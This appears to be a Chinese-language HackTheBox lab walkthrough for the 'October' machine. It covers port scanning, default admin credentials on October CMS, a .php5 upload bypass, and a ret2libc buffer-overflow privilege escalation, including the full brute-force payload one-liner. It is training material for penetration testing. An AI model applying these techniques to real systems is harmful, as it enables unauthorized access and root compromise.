HackTheBox::October

0x00 信息收集

nmap -Pn -p- -T4 --min-rate=1000 10.10.10.16
image.png
nmap -Pn -p 22,80 -sCV 10.10.10.16
image.png
查看80端口的服务,发现是October CMS
image.png
目录枚举
image.png
image.png
使用admin/admin成功登录后台
image.png

0x01 漏洞利用

image.png
后台存在上传绕过,只需要将php后缀更改为php5即可。
image.png

0x02 权限提升

上传LinEnums.sh进行枚举
image.png
考察缓冲区溢出
利用nc把ovrflw文件拷贝至本地
image.png
image.png
使用gdb查看该文件,可以看到strcpy函数,该函数常常存在缓冲区溢出问题。
image.png
先尝试生成150个字符
image.png
查找EIP
image.png
查找偏移量
image.png
Now when we try to insert shellcode into the buffer but we were unable to execute it because of DEP. It prevents code from being executed in the stack. Now we are going to do a ret2libc attack to execute a process already present in the process’ executable memory. We go into the target machine and find ASLR in enabled so we have to brute force the address. Now we find the address of system, exit and /bin/sh.
image.png
payload(system+exit+s/bin/sh):

while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112 +"\x00\x00\xe1\xf7\x50\x29\xe0\xf7\x38\x73\xf5\xf7"'); done

image.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值